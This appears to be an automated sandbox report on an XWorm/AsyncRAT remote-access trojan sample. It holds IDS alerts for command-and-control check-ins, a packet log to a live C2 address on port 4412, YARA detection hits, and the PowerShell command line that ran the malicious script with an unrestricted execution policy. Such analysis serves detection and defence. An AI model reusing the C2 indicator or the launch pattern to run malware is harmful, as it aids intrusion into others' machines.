                                        2025-01-26T10:36:03.942247+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:06.915056+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:08.851433+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:08.857621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:08.974394+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:08.976077+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:09.104641+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:09.106351+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:09.576639+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:09.578400+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:22.254524+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:22.255919+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:22.256062+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:22.256207+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:22.257763+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:22.472568+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:22.474521+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:24.180863+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:24.397558+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:24.399249+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:34.555246+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:34.559337+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:35.219704+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:35.221750+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:36.902304+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:47.007422+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:47.011390+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:36:58.808052+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:36:58.809874+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:04.368257+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:04.373284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:06.917682+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:07.432087+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:07.434211+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:11.273258+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:11.275725+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:23.070700+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:23.204297+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:31.646275+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:31.648147+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:31.767760+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:31.769145+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        2025-01-26T10:37:36.936336+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:43.523152+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2284412192.168.2.549709TCP
                                        2025-01-26T10:37:43.537690+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.549709176.113.115.2284412TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 26, 2025 10:34:16.473707914 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:16.478557110 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:16.478660107 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:16.746017933 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:16.750857115 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:28.544275999 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:28.549175978 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:28.769948006 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:28.814225912 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:28.819127083 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:36.918087959 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:36.961432934 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:40.337477922 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:40.342442036 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:40.555435896 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:40.558655024 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:40.563498974 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:52.133903980 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:52.138974905 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:52.350845098 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:34:52.357325077 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:34:52.362904072 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:03.930773973 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:03.937963009 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:04.163753033 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:04.166178942 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:04.171386003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:06.917866945 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:06.961540937 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:15.727806091 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:15.732698917 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:15.963702917 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:15.967787027 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:15.972578049 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.430901051 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:25.435942888 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.633748055 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:25.638618946 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.653661966 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.655476093 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:25.706727028 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.854717016 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:25.864085913 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:25.868936062 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:26.383768082 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:26.388530970 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:26.619507074 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:26.643517017 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:26.648304939 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.258878946 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:31.263725042 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.488042116 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.490609884 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:31.495409012 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.508718014 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:31.513504982 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.901153088 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:31.946434975 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:31.951338053 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:36.906588078 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:36.961664915 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:40.899533987 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:40.904432058 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:41.125293016 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:41.127120018 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:41.133542061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.698976040 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:52.704044104 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.921008110 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:52.923666000 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:52.928633928 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.337096930 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:56.342314959 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.558294058 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:35:56.564382076 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:35:56.569220066 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.212090015 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.217067003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.321516991 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.326473951 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.352952003 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.357848883 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.415560007 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.420509100 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.438235044 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.442441940 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.490748882 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.524586916 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.529503107 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.562562943 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.564213037 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.610682011 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.688442945 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.689950943 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.694849968 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.811882973 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.820321083 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.825231075 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.934237003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:03.942246914 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:03.947299004 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:06.915055990 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:06.961744070 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.633966923 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.639168978 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.711914062 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.716850042 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.851433039 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.852612019 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.857564926 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.857620955 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.862437963 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.974394083 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:08.976077080 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:08.980982065 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.104640961 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.106350899 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.111181021 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.290158033 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.295129061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.576638937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:09.578399897 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:09.583355904 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:21.087090015 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:21.092170954 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.245496988 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.254523993 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.255918980 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256062031 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256144047 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.256145000 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.256206989 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.256365061 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.257608891 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.257762909 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.262571096 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.472568035 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:22.474520922 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:22.481369019 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.180862904 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:24.186090946 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.397557974 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:24.399249077 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:24.404094934 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.337131023 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.342619896 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.555246115 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.559336901 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.564336061 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:34.993383884 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:34.998528957 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:35.219703913 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:35.221750021 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:35.226773024 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:36.902303934 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:36.946343899 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:46.790302038 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:46.795414925 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:47.007421970 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:47.011389971 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:47.016360998 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.590872049 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:58.596406937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.808052063 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:36:58.809874058 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:36:58.814994097 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.151443005 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:04.156507015 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.368257046 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:04.373284101 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:04.378196955 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:06.917681932 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:06.977711916 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.212412119 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.217536926 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:07.432086945 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:07.434211016 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:07.439559937 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.056114912 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:11.061599016 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.273257971 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:11.275724888 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:11.280879021 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:22.852962971 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:22.858017921 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:23.070699930 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:23.118339062 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:23.204297066 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:23.209712029 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.415563107 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.420692921 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.509462118 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.514764071 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.646275043 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.648147106 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.653599024 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.767760038 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:31.769145012 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:31.774019003 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:36.936336040 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:36.977803946 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.306102037 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.311590910 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:43.523152113 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:43.537689924 CET497094412192.168.2.5176.113.115.228
                                        Jan 26, 2025 10:37:43.542886972 CET441249709176.113.115.228192.168.2.5
                                        Jan 26, 2025 10:37:54.146080971 CET497094412192.168.2.5176.113.115.228

                                        Click to jump to process

                                        050100150200s0.0050100150MB

                                        Click to jump to process

                                        • File
                                        • Registry
                                        • Network

                                        Click to dive into process behavior distribution

                                        Target ID:0
                                        Start time:04:34:09
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1"
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD8F5B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:high
                                        Has exited:true
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                        Target ID:1
                                        Start time:04:34:09
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:04:34:12
                                        Start date:26/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        Imagebase:0xb50000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4338325548.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4340987484.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                        Target ID:4
                                        Start time:04:34:12
                                        Start date:26/01/2025
                                        Path:C:\Windows\System32\wermgr.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3716" "2640" "2540" "2656" "0" "0" "2660" "0" "0" "0" "0" "0"
                                        Imagebase:0x7ff6070d0000
                                        File size:229'728 bytes
                                        MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
